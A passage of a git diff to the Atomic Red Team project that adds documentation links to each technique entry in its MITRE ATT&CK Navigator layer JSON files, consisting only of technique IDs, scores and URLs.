tomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index 1b23e51b..4ee7afcc 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1072","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":